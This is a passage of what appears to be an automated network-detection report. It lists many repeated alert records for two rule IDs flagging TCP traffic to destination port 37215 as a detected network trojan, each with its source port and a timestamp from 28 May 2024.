          SID:2835222
          Source Port:41816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671874
          SID:2829579
          Source Port:48286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064903
          SID:2835222
          Source Port:39924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206956
          SID:2835222
          Source Port:55682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405171
          SID:2829579
          Source Port:51786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797231
          SID:2835222
          Source Port:60456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177219
          SID:2835222
          Source Port:48028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738521
          SID:2829579
          Source Port:33484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207027
          SID:2829579
          Source Port:33518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.058008
          SID:2829579
          Source Port:54194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.608557
          SID:2835222
          Source Port:44790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280890
          SID:2835222
          Source Port:42210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167575
          SID:2835222
          Source Port:45610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272449
          SID:2835222
          Source Port:55210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.172230
          SID:2829579
          Source Port:34828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724334
          SID:2829579
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923689
          SID:2835222
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039186
          SID:2835222
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666228
          SID:2835222
          Source Port:54980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739814
          SID:2835222
          Source Port:44402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553084
          SID:2829579
          Source Port:40434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611885
          SID:2835222
          Source Port:50916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084354
          SID:2835222
          Source Port:40844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470873
          SID:2829579
          Source Port:34356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879314
          SID:2835222
          Source Port:36274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186971
          SID:2835222
          Source Port:53620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989116
          SID:2835222
          Source Port:54178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267726
          SID:2835222
          Source Port:52862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225208
          SID:2835222
          Source Port:37948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.302989
          SID:2835222
          Source Port:49448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668070
          SID:2835222
          Source Port:53352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025828
          SID:2835222
          Source Port:50034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806492
          SID:2829579
          Source Port:36320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102237
          SID:2829579
          Source Port:56392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087998
          SID:2829579
          Source Port:45938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.187442
          SID:2829579
          Source Port:36388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291749
          SID:2835222
          Source Port:39082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669528
          SID:2829579
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931408
          SID:2829579
          Source Port:50900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592105
          SID:2835222
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809938
          SID:2829579
          Source Port:50944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114155
          SID:2829579
          Source Port:40842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235643
          SID:2835222
          Source Port:34020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877941
          SID:2829579
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943984
          SID:2829579
          Source Port:47756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992291
          SID:2829579
          Source Port:52380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150400
          SID:2835222
          Source Port:60848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796327
          SID:2835222
          Source Port:58544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276207
          SID:2835222
          Source Port:49238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239958
          SID:2829579
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241144
          SID:2835222
          Source Port:41230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223670
          SID:2835222
          Source Port:42958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401046
          SID:2835222
          Source Port:48330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131766
          SID:2835222
          Source Port:57948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979054
          SID:2829579
          Source Port:37368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600484
          SID:2835222
          Source Port:58014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271175
          SID:2829579
          Source Port:41340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287318
          SID:2829579
          Source Port:54120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941398
          SID:2835222
          Source Port:55202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102730
          SID:2829579
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770867
          SID:2835222
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401371
          SID:2829579
          Source Port:47790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210551
          SID:2835222
          Source Port:58950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336107
          SID:2835222
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925439
          SID:2829579
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.618740
          SID:2829579
          Source Port:43366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075830
          SID:2835222
          Source Port:47548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.697016
          SID:2829579
          Source Port:59274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543243
          SID:2829579
          Source Port:34932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774308
          SID:2829579
          Source Port:49360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329005
          SID:2835222
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207010
          SID:2835222
          Source Port:60352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114380
          SID:2829579
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064788
          SID:2829579
          Source Port:44628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266464
          SID:2829579
          Source Port:41910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841346
          SID:2829579
          Source Port:35080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592978
          SID:2829579
          Source Port:36270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689317
          SID:2835222
          Source Port:37382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267407
          SID:2835222
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877927
          SID:2829579
          Source Port:42984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667685
          SID:2829579
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946596
          SID:2829579
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780392
          SID:2829579
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763646
          SID:2829579
          Source Port:58128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170431
          SID:2835222
          Source Port:55692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113129
          SID:2835222
          Source Port:55126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847680
          SID:2835222
          Source Port:55222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229797
          SID:2829579
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923494
          SID:2835222
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299379
          SID:2829579
          Source Port:50150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885883
          SID:2829579
          Source Port:53130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923518
          SID:2829579
          Source Port:50668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095548
          SID:2829579
          Source Port:41976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107415
          SID:2835222
          Source Port:50258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921106
          SID:2829579
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115840
          SID:2829579
          Source Port:34308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324191
          SID:2835222
          Source Port:35492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338658
          SID:2835222
          Source Port:37166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175786
          SID:2829579
          Source Port:49974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070446
          SID:2835222
          Source Port:58738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215977
          SID:2835222
          Source Port:37210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691592
          SID:2829579
          Source Port:53146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977921
          SID:2829579
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870564
          SID:2835222
          Source Port:32966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230131
          SID:2829579
          Source Port:48486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804666
          SID:2835222
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890754
          SID:2829579
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204628
          SID:2829579
          Source Port:47128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241024
          SID:2835222
          Source Port:48978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664142
          SID:2829579
          Source Port:56086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039593
          SID:2835222
          Source Port:52406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067215
          SID:2835222
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843136
          SID:2829579
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010447
          SID:2829579
          Source Port:47150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.364851
          SID:2829579
          Source Port:34352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326352
          SID:2835222
          Source Port:37264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075429
          SID:2829579
          Source Port:32776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.596946
          SID:2829579
          Source Port:41188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401344
          SID:2829579
          Source Port:55142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724655
          SID:2829579
          Source Port:58810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201375
          SID:2835222
          Source Port:50270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400858
          SID:2829579
          Source Port:48332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102805
          SID:2835222
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710287
          SID:2835222
          Source Port:53380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842926
          SID:2835222
          Source Port:39122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336053
          SID:2835222
          Source Port:40536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213625
          SID:2829579
          Source Port:51930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598780
          SID:2835222
          Source Port:33888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907751
          SID:2829579
          Source Port:50814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708437
          SID:2835222
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613926
          SID:2835222
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325804
          SID:2835222
          Source Port:46766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842123
          SID:2835222
          Source Port:49226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774530
          SID:2835222
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684584
          SID:2835222
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.103223
          SID:2835222
          Source Port:46484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532807
          SID:2829579
          Source Port:34822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065387
          SID:2835222
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322116
          SID:2829579
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728717
          SID:2829579
          Source Port:43388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772902
          SID:2835222
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528262
          SID:2829579
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768667
          SID:2829579
          Source Port:60144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273170
          SID:2829579
          Source Port:53156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622183
          SID:2829579
          Source Port:35550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180310
          SID:2829579
          Source Port:36106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338504
          SID:2829579
          Source Port:33306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213513
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216576
          SID:2835222
          Source Port:46390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864639
          SID:2829579
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964424
          SID:2829579
          Source Port:37154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804520
          SID:2835222
          Source Port:60012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669282
          SID:2835222
          Source Port:34442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977689
          SID:2835222
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476789
          SID:2835222
          Source Port:37756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124592
          SID:2835222
          Source Port:58820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156204
          SID:2835222
          Source Port:53276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935152
          SID:2835222
          Source Port:50306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203785
          SID:2835222
          Source Port:58840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.601408
          SID:2835222
          Source Port:44298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196125
          SID:2829579
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352538
          SID:2829579
          Source Port:43210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475925
          SID:2835222
          Source Port:37734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949469
          SID:2835222
          Source Port:50748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195881
          SID:2835222
          Source Port:46790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876964
          SID:2829579
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332031
          SID:2829579
          Source Port:47852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044386
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328672
          SID:2829579
          Source Port:49968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525767
          SID:2835222
          Source Port:54804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622915
          SID:2829579
          Source Port:34156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.709446
          SID:2835222
          Source Port:41994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680264
          SID:2829579
          Source Port:59176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.249967
          SID:2835222
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669299
          SID:2835222
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010535
          SID:2835222
          Source Port:60978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339207
          SID:2835222
          Source Port:37262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527311
          SID:2829579
          Source Port:49772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266752
          SID:2829579
          Source Port:43060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532718
          SID:2829579
          Source Port:35448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112273
          SID:2835222
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341817
          SID:2835222
          Source Port:59562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630520
          SID:2829579
          Source Port:40610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941062
          SID:2835222
          Source Port:48462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473624
          SID:2829579
          Source Port:48782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102792
          SID:2829579
          Source Port:39566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840398
          SID:2829579
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334225
          SID:2829579
          Source Port:38312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273214
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177306
          SID:2829579
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922673
          SID:2835222
          Source Port:39836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793330
          SID:2829579
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666992
          SID:2829579
          Source Port:38476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136044
          SID:2829579
          Source Port:50840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666466
          SID:2829579
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102191
          SID:2835222
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605598
          SID:2835222
          Source Port:57488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630045
          SID:2829579
          Source Port:34422
          Destination Port:37215
